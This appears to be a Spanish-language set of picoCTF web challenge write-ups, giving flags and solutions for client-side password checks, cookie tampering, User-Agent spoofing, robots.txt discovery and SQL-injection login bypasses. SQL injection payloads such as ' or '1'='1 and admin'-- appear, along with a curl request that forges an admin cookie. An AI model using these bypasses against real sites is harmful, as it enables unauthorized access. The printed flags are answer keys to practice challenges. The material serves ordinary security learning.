# Web

## **dont-use-client-side**

## Problema

### Description

Can you break into this super secure portal? `https://jupiter.challenges.picoctf.org/problem/37821/` ([link](https://jupiter.challenges.picoctf.org/problem/37821/)) or http://jupiter.challenges.picoctf.org:37821

## Solucion

Entramos al inspector de codigo y en el codigo se encuentra:

```sql
function verify() {
    checkpass = document.getElementById("pass").value;
    split = 4;
    if (checkpass.substring(0, split) == 'pico') {
      if (checkpass.substring(split*6, split*7) == 'a3c8') {
        if (checkpass.substring(split, split*2) == 'CTF{') {
         if (checkpass.substring(split*4, split*5) == 'ts_p') {
          if (checkpass.substring(split*3, split*4) == 'lien') {
            if (checkpass.substring(split*5, split*6) == 'lz_1') {
              if (checkpass.substring(split*2, split*3) == 'no_c') {
                if (checkpass.substring(split*7, split*8) == '9}') {
                  alert("Password Verified")
                  }
                }
              }
      
            }
          }
        }
      }
    }
    else {
      alert("Incorrect password");
    }
    
  }
picoCTF{no_clients_plz_1a3c89}
```

## CTF

picoCTF{no_clients_plz_1a3c89}

## **logon**

## Problema

The factory is hiding things from all of its users. Can you login as Joe and find what they've been looking at? `https://jupiter.challenges.picoctf.org/problem/13594/` ([link](https://jupiter.challenges.picoctf.org/problem/13594/)) or http://jupiter.challenges.picoctf.org:13594

## Solucion

```sql
</html>jorgechz-picoctf@webshell:~$ curl https://jupiter.challenges.picoctf.org/proble/flag -H "Cookie: admin=True" |grep pico
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1312  100  1312    0     0   3457      0 --:--:-- --:--:-- --:--:--  3461
            <p style="text-align:center; font-size:30px;"><b>Flag</b>: <code>picoCTF{th3_c0nsp1r4cy_l1v3s_d1c24fef}</code></p>
jorgechz-picoctf@webshell:~$
```

## CTF

picoCTF{th3_c0nsp1r4cy_l1v3s_d1c24fef}

## **where are the robots**

## Problema

Can you find the robots? `https://jupiter.challenges.picoctf.org/problem/36474/` ([link](https://jupiter.challenges.picoctf.org/problem/36474/)) or http://jupiter.challenges.picoctf.org:36474

## Solucion

[https://jupiter.challenges.picoctf.org/problem/36474/robots.txt](https://jupiter.challenges.picoctf.org/problem/36474/robots.txt)

[https://jupiter.challenges.picoctf.org/problem/36474/477ce.html](https://jupiter.challenges.picoctf.org/problem/36474/477ce.html)

## CTF

picoCTF{ca1cu1at1ng_Mach1n3s_477ce}

## **Client-side-again**

## Problema

### Description

Can you break into this super secure portal? `https://jupiter.challenges.picoctf.org/problem/56816/` ([link](https://jupiter.challenges.picoctf.org/problem/56816/)) or http://jupiter.challenges.picoctf.org:56816

## Solucion

```sql
'use strict';
/** @type {!Array} */
var _0x5a46 = ["37115}", "_again_3", "this", "Password Verified", "Incorrect password", "getElementById", "value", "substring", "picoCTF{", "not_this"];
(function(data, i) {
  /**
   * @param {number} isLE
   * @return {undefined}
   */
  var write = function(isLE) {
    for (; --isLE;) {
      data["push"](data["shift"]());
    }
  };
  write(++i);
})(_0x5a46, 435);
/**
 * @param {string} level
 * @param {?} ai_test
 * @return {?}
 */
var _0x4b5b = function(level, ai_test) {
  /** @type {number} */
  level = level - 0;
  var rowsOfColumns = _0x5a46[level];
  return rowsOfColumns;
};
/**
 * @return {undefined}
 */
function verify() {
  checkpass = document[_0x4b5b("0x0")]("pass")[_0x4b5b("0x1")];
  /** @type {number} */
  split = 4;
  if (checkpass[_0x4b5b("0x2")](0, split * 2) == _0x4b5b("0x3")) {
    if (checkpass[_0x4b5b("0x2")](7, 9) == "{n") {
      if (checkpass[_0x4b5b("0x2")](split * 2, split * 2 * 2) == _0x4b5b("0x4")) {
        if (checkpass[_0x4b5b("0x2")](3, 6) == "oCT") {
          if (checkpass[_0x4b5b("0x2")](split * 3 * 2, split * 4 * 2) == _0x4b5b("0x5")) {
            if (checkpass["substring"](6, 11) == "F{not") {
              if (checkpass[_0x4b5b("0x2")](split * 2 * 2, split * 3 * 2) == _0x4b5b("0x6")) {
                if (checkpass[_0x4b5b("0x2")](12, 16) == _0x4b5b("0x7")) {
                  alert(_0x4b5b("0x8"));
                }
              }
            }
          }
        }
      }
    }
  } else {
    alert(_0x4b5b("0x9"));
  }
}
;
```

En la terminal del navegador escribimos lo siguiente

```sql
_0x4b5b("0x1")
"value"
_0x4b5b("0x2")
"substring"
_0x4b5b("0x3")
"picoCTF{"
_0x4b5b("0x4")
"not_this"
_0x4b5b("0x5")
"37115}"
_0x4b5b("0x6")
"_again_3"
_0x4b5b("0x7")
"this"
_0x4b5b("0x8")
"Password Verified"
_0x4b5b("0x9")
"Incorrect password"
_0x4b5b("0x0")
"getElementById"
```

Y este nos da la conversion, y esto los tenemos que remplazar

```sql
function verify() {
  checkpass = document[("getElementById")]("pass")[("value")];
  /** @type {number} */
  split = 4;
  if (checkpass["substring"](0, split * 2) == ("picoCTF{")) {
    if (checkpass[("substring")](7, 9) == "{n") {
      if (checkpass[("substring")](split * 2, split * 2 * 2) == ("not_this")) {
        if (checkpass[("substring")](3, 6) == "oCT") {
          if (checkpass[("substring")](split * 3 * 2, split * 4 * 2) == _04b5b("37115}")) {
            if (checkpass["substring"](6, 11) == "F{not") {
              if (checkpass[("substring")](split * 2 * 2, split * 3 * 2) == ("_again_3")) {
                if (checkpass[("substring")](12, 16) == ("this")) {
                  alert(_04b5b("Password Verified"));
                }
              }
            }
          }
        }
      }
    }
  } else {
    alert(_0x4b5b("Incorrect password"));
  }
}
```

Despues con un codigo python lo podemos resolver:

```sql
text = """
  if (checkpass["substring"](0, split * 2) == "picoCTF{") {
    if (checkpass["substring"](7, 9) == "{n") {
      if (checkpass["substring"](split * 2, split * 2 * 2) == "not_this") {
        if (checkpass["substring"](3, 6) == "oCT") {
          if (checkpass["substring"](split * 3 * 2, split * 4 * 2) == "37115}") {
            if (checkpass["substring"](6, 11) == "F{not") {
                if (checkpass["substring"](12, 16) == "this") {
              if (checkpass["substring"](split * 2 * 2, split * 3 * 2) == "_again_3") {
"""

flag = [None] * 32
split = 4
for line in text.split("\n"):
    line = line.strip()
    if line == "": 
        continue
    line = line.replace('if (checkpass["substring"](', 'flag[').replace(', ', ":").replace(') == ', '] = ').replace(') {', '')
    exec(line)

print ("".join(flag))
```

## CTF

picoCTF{not_this_again_337115}

## **picobrowser**

## Problema

This website can be rendered only by **picobrowser**, go and catch the flag! `https://jupiter.challenges.picoctf.org/problem/26704/` ([link](https://jupiter.challenges.picoctf.org/problem/26704/)) or http://jupiter.challenges.picoctf.org:26704

## Solucion

[https://www.youtube.com/watch?v=9d6-N0oJwOk&list=PLDo9DMLZyP6kTZ8Td37-LdbAx4-yNfHBl&index=5](https://www.youtube.com/watch?v=9d6-N0oJwOk&list=PLDo9DMLZyP6kTZ8Td37-LdbAx4-yNfHBl&index=5)

Me guie en este video ya que nos explica como funciona el User-Agent y como podemos modificar para poder acceder a esta bandera

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled.png)

## CTF

**`picoCTF{p1c0_s3cr3t_ag3nt_e9b160d0}`**

## **Irish-Name-Repo 1**

## Problema

There is a website running at `https://jupiter.challenges.picoctf.org/problem/33850/` ([link](https://jupiter.challenges.picoctf.org/problem/33850/)) or http://jupiter.challenges.picoctf.org:33850. Do you think you can log us in? Try to see if you can login!

## Solucion

En este caso utilizamos inyeccion SQL primero tenemos que entrar a inspecciones y poner 1 en debug

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%201.png)

Despues en el login ponemos lo siguiente ‘or ‘1’=’1 en los dos campos en 

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%202.png)

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%203.png)

## CTF

picoCTF{s0m3_SQL_f8adf3fb}

## **Irish-Name-Repo 2**

## Problema

There is a website running at `https://jupiter.challenges.picoctf.org/problem/64649/` ([link](https://jupiter.challenges.picoctf.org/problem/64649/)).
 Someone has bypassed the login before, and now it's being strengthened.
 Try to see if you can still login! or 
http://jupiter.challenges.picoctf.org:64649

## Solucion

Utilizamos admin’— 

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%204.png)

## CTF

picoCTF{m0R3_SQL_plz_aee925db}

## **Irish-Name-Repo 3**

## Problema

There is a secure website running at `https://jupiter.challenges.picoctf.org/problem/54253/` ([link](https://jupiter.challenges.picoctf.org/problem/54253/)) or http://jupiter.challenges.picoctf.org:54253. Try to see if you can login as admin!

## Solucion

Utilizan un cifrado cesar de ROT13 

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%205.png)

' be 1=1;

## CTF

picoCTF{3v3n_m0r3_SQL_7f5767f6}

## **JaWT Scratchpad**

## Problema

Check the admin scratchpad! `https://jupiter.challenges.picoctf.org/problem/63090/` or http://jupiter.challenges.picoctf.org:63090<

## Solucion

[https://infosecwriteups.com/jawt-scratchpad-picoctf-93766d81fd8e](https://infosecwriteups.com/jawt-scratchpad-picoctf-93766d81fd8e)

## CTF

## [GET aHEAD](https://play.picoctf.org/practice/challenge/132)

## Problema

### Description

Find the flag being held on this server to get ahead of the competition [http://mercury.picoctf.net:34561/](http://mercury.picoctf.net:34561/)

## Solucion

Me base en el video de [https://www.youtube.com/watch?v=oiZk0tIkR48&list=PLDo9DMLZyP6kTZ8Td37-LdbAx4-yNfHBl&index=11](https://www.youtube.com/watch?v=oiZk0tIkR48&list=PLDo9DMLZyP6kTZ8Td37-LdbAx4-yNfHBl&index=11)

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%206.png)

## CTF

picoCTF{r3j3ct_th3_du4l1ty_8f878508}

## **Cookies**

## Problema

Who doesn't love cookies? Try to figure out the best one. [http://mercury.picoctf.net:29649/](http://mercury.picoctf.net:29649/)

## Solucion

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%207.png)

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%208.png)

## CTF

picoCTF{3v3ry1_l0v3s_c00k135_a1f5bdb7}

## **Scavenger Hunt**

## Problema

There is some interesting information hidden around this site [http://mercury.picoctf.net:39698/](http://mercury.picoctf.net:39698/). Can you find it?

## Solucion

Tenemos que buscar en los archivos fuentes para encotrar la bandera

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%209.png)

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%2010.png)

En el archivo js nos muestra un mensaje, en el cual podemos deducir que la siguiente parte se va a encontrar en el archivo rorbots.txt. al ingresar ese archivo robots.txt aparece los siguiente

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%2011.png)

En algunas paginas por defecto guardan en un servidor apache algunas configuraciones para acceder a esas configuraciones ponemos el siguiente link .htaccess

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%2012.png)

Nos pide que busquemos en otro sitio [https://en.wikipedia.org/wiki/.DS_Store](https://en.wikipedia.org/wiki/.DS_Store). .DS_store guarda mucha mas informacion

![Untitled](Web%20863a3cdab87449c985c1b49358e932e3/Untitled%2013.png)

## CTF

## Nivel

## Problema

## Solucion

## CTF

## Nivel

## Problema

## Solucion

## CTF

## Nivel

## Problema

## Solucion

## CTF

## Nivel

## Problema

## Solucion

## CTF